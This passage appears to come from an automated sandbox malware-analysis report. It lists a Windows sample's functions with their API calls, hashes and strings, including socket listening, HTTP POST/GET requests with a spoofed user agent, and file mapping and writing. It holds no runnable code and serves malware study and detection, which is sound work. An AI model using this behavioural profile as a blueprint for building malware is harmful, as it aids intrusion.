                                                                                                                                                                                                      control_flow_graph 628 401920-401947 GetTickCount WaitForSingleObject 629 401ac9-401acf 628->629 630 40194d-401964 WSAWaitForMultipleEvents 628->630 631 4019f0-401a03 GetTickCount 630->631 632 40196a-401981 WSAEnumNetworkEvents 630->632 633 401a43-401a4c GetTickCount 631->633 634 401a05-401a14 EnterCriticalSection 631->634 632->631 635 401983-401988 632->635 639 401ab5-401ac3 WaitForSingleObject 633->639 640 401a4e-401a5d EnterCriticalSection 633->640 636 401a16-401a1d 634->636 637 401a3a-401a41 LeaveCriticalSection 634->637 635->631 638 40198a-401990 635->638 641 401a35 call 401820 636->641 642 401a1f-401a27 636->642 637->639 638->631 643 401992-4019b1 accept 638->643 639->629 639->630 644 401aa1-401ab1 LeaveCriticalSection GetTickCount 640->644 645 401a5f-401a77 InterlockedExchangeAdd call 40df20 640->645 641->637 642->636 646 401a29-401a30 LeaveCriticalSection 642->646 643->631 648 4019b3-4019c2 call 4022c0 643->648 644->639 653 401a97-401a9f 645->653 654 401a79-401a82 645->654 646->639 648->631 655 4019c4-4019df call 401740 648->655 653->644 653->645 654->653 656 401a84-401a8d call 40b4f0 654->656 655->631 661 4019e1-4019e7 655->661 656->653 661->631 662 4019e9-4019eb call 401cf0 661->662 662->631
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040192C
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                                                                                                                                      • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                                                                                                                                      • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                                                                                                                                      • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004019F6
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00401A43
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                                                                                                      • String ID: PCOI$ilci
                                                                                                                                                                                                      • API String ID: 3345448188-3762367603
                                                                                                                                                                                                      • Opcode ID: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
                                                                                                                                                                                                      • Instruction ID: 80b39a6ab1993389b90647d5cb6895440bceaa9a0d1ea8ab9cba8154187b69d5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7411771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF855A72E1DB78E985CB99
                                                                                                                                                                                                      Function 0040EF70 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138networkfileCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.NTDLL ref: 0040EF98
                                                                                                                                                                                                      • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EFE8
                                                                                                                                                                                                      • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EFFB
                                                                                                                                                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040F034
                                                                                                                                                                                                      • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F06A
                                                                                                                                                                                                      • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040F095
                                                                                                                                                                                                      • HttpSendRequestA.WININET(00000000,004126B0,000000FF,00009E34), ref: 0040F0BF
                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040F0FE
                                                                                                                                                                                                      • memcpy.NTDLL(00000000,?,00000000), ref: 0040F150
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040F181
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040F18E
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040F19B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                                                                                                      • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                                                                                                      • API String ID: 2761394606-2217117414
                                                                                                                                                                                                      • Opcode ID: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
                                                                                                                                                                                                      • Instruction ID: ef1808732392904e9289ee89b59ca4b2c464bfe5f798c53c6f33b23f739279b9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40510AB5A01228ABDB36CF54DC54BDA73BCAB48705F1081E9B50DAA280D7B96FC4CF54
                                                                                                                                                                                                      Function 00401600 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 96networkCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                                                                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                                                                                                                                      • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                                                                                      • String ID: PCOI$ilci$.Wu
                                                                                                                                                                                                      • API String ID: 2403999931-3309795540
                                                                                                                                                                                                      • Opcode ID: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
                                                                                                                                                                                                      • Instruction ID: 00719830d96ac068de130eecfd85e1b44ef6fd60ec2c55820453df0d9b8f54e2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d3037cf696ecd8756279fad8891fdfc713d08fe7f166539a7d0865b035c0410
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B731A671900705ABC710AF70EC48B97B7B8BF09300F048A2AE569A7691D779F894CB98
                                                                                                                                                                                                      Function 004058C0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73windowsleepregistryCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.NTDLL ref: 004058D8
                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004058F0
                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 00405904
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040590A
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405913
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00405926
                                                                                                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 00405933
                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040595C
                                                                                                                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405977
                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00405985
                                                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 0040598F
                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 004059A1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                                                                                                      • String ID: %x%X$0
                                                                                                                                                                                                      • API String ID: 716646876-225668902
                                                                                                                                                                                                      • Opcode ID: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                                                                                      • Instruction ID: bd9536bbadbf21864e97b89de5b907373c0f6f38ddabaab6f1c3dd09ba998754
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7211AB1940308FBEB109BA0DD49FEE7B78EB04711F14852AF601BA1D0DBB99544CF69
                                                                                                                                                                                                      Function 0040E640 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130networkfileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.NTDLL ref: 0040E668
                                                                                                                                                                                                      • InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
                                                                                                                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
                                                                                                                                                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
                                                                                                                                                                                                      • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
                                                                                                                                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
                                                                                                                                                                                                      • memcpy.NTDLL(00000000,?,00000000), ref: 0040E7FA
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040E837
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040E844
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040E851
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                                                                                                      • String ID: <$GET
                                                                                                                                                                                                      • API String ID: 1205665004-427699995
                                                                                                                                                                                                      • Opcode ID: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
                                                                                                                                                                                                      • Instruction ID: bd69c55cfb2b9f93b8bf7ceaaaaaf86fc3309545456039a657a23fe3286800e0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F75109B1A41228ABDB36DB50CC55BE973BCAB44705F0484E9E60DAA2C0D7B96BC4CF54
                                                                                                                                                                                                      Function 0040F240 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 144fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040F272
                                                                                                                                                                                                      • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040F293
                                                                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040F2B2
                                                                                                                                                                                                      • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F2CB
                                                                                                                                                                                                      • memcmp.NTDLL ref: 0040F35D
                                                                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040F380
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040F38A
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040F394
                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F3B3
                                                                                                                                                                                                      • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040F3D8
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040F3E2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 3902698870-3424199868
                                                                                                                                                                                                      • Opcode ID: 397832f4b3c545954de9817604727ce70a7a27c44a74f567f7741af6b4247064
                                                                                                                                                                                                      • Instruction ID: 91565a6fedc79cda49cfd97bae5198494bb6489b7e374c7f74ac69d8e3e388a5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 397832f4b3c545954de9817604727ce70a7a27c44a74f567f7741af6b4247064
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75514BB4E40308FBDB24DBA4CC49F9EB774AB48304F108569F611B72C0D7B9AA44CB98
                                                                                                                                                                                                      Function 0040DD50 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 0040DD56
                                                                                                                                                                                                      • GetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD5D
                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 0040DD68
                                                                                                                                                                                                      • SetThreadPriority.KERNEL32(00000000,?,?,?,00408480,?,000000FF), ref: 0040DD6F
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(00408480,00000000), ref: 0040DD92
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(000000FB), ref: 0040DDC7
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040DE12
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040DE2E
                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 0040DE5E
                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 0040DE6D
                                                                                                                                                                                                      • SetThreadPriority.KERNEL32(00000000,?,?,?,00408480), ref: 0040DE74
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3862671961-0
                                                                                                                                                                                                      • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                                                                                      • Instruction ID: 15ec6ce41066bd2df298828df26a4308ea05a03792f046612c1f6ffbd780898a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B412C74E00209DBDB04DFE4D844BAEBB71FF54315F108169E916AB381D7789A84CF99
                                                                                                                                                                                                      Function 0040BC70 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(004165F8,?,?,?,?,?,?,00408403), ref: 0040BC7B
                                                                                                                                                                                                      • CreateFileW.KERNEL32(004163E0,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040BCCD
                                                                                                                                                                                                      • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040BCEE
                                                                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040BD0D
                                                                                                                                                                                                      • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040BD22
                                                                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040BD88
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040BD92
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040BD9C
                                                                                                                                                                                                        • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                                                                                        • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL ref: 0040DF38
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 439099756-3424199868
                                                                                                                                                                                                      • Opcode ID: 95b7ad4b48b2612a2ac74941d1961fd8d23959eee21eec156b7f746c57c5f411
                                                                                                                                                                                                      • Instruction ID: 789285c27e92e60cc42243599a26330008c438e37824d2da8ff51af530b364ad
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95b7ad4b48b2612a2ac74941d1961fd8d23959eee21eec156b7f746c57c5f411
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F413A74E40309EBDB10EBA4DC4ABAEB774EB44705F20856AF6117A2C1C7B96941CB9C
                                                                                                                                                                                                      Function 00405C00 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(00415B88,?,?,?,?,?,004083CD), ref: 00405C0B
                                                                                                                                                                                                      • CreateFileW.KERNEL32(00415FC8,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,004083CD), ref: 00405C25
                                                                                                                                                                                                      • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C46
                                                                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C65
                                                                                                                                                                                                      • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C7E
                                                                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00405D0B
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405D15
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 00405D1F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 3956458805-3424199868
                                                                                                                                                                                                      • Opcode ID: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
                                                                                                                                                                                                      • Instruction ID: 999418e1eeb904d95552c7fd1475d0c30f1e1fd8627807f9f1e65d0b0efdc9c4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE310E74E40209EBDB14DBA4DC49FAFB774EB48700F20856AE6017B2C0D7B96941CF99
                                                                                                                                                                                                      Function 004060A0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00415B88,00000000,0040C2A2,006A0266,?,0040C2BE,00000000,0040D66C,?), ref: 004060AF
                                                                                                                                                                                                      • memcpy.NTDLL(?,00000000,00000100), ref: 00406141
                                                                                                                                                                                                      • CreateFileW.KERNEL32(00415FC8,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406265
                                                                                                                                                                                                      • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004062C7
                                                                                                                                                                                                      • FlushFileBuffers.KERNEL32(000000FF), ref: 004062D3
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 004062DD
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00415B88,?,?,?,?,?,?,0040C2BE,00000000,0040D66C,?), ref: 004062E8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 1457358591-3424199868
                                                                                                                                                                                                      • Opcode ID: e72a487dce04114ef622edc0900d7397c89588e022fce289eeb1184eb778240f
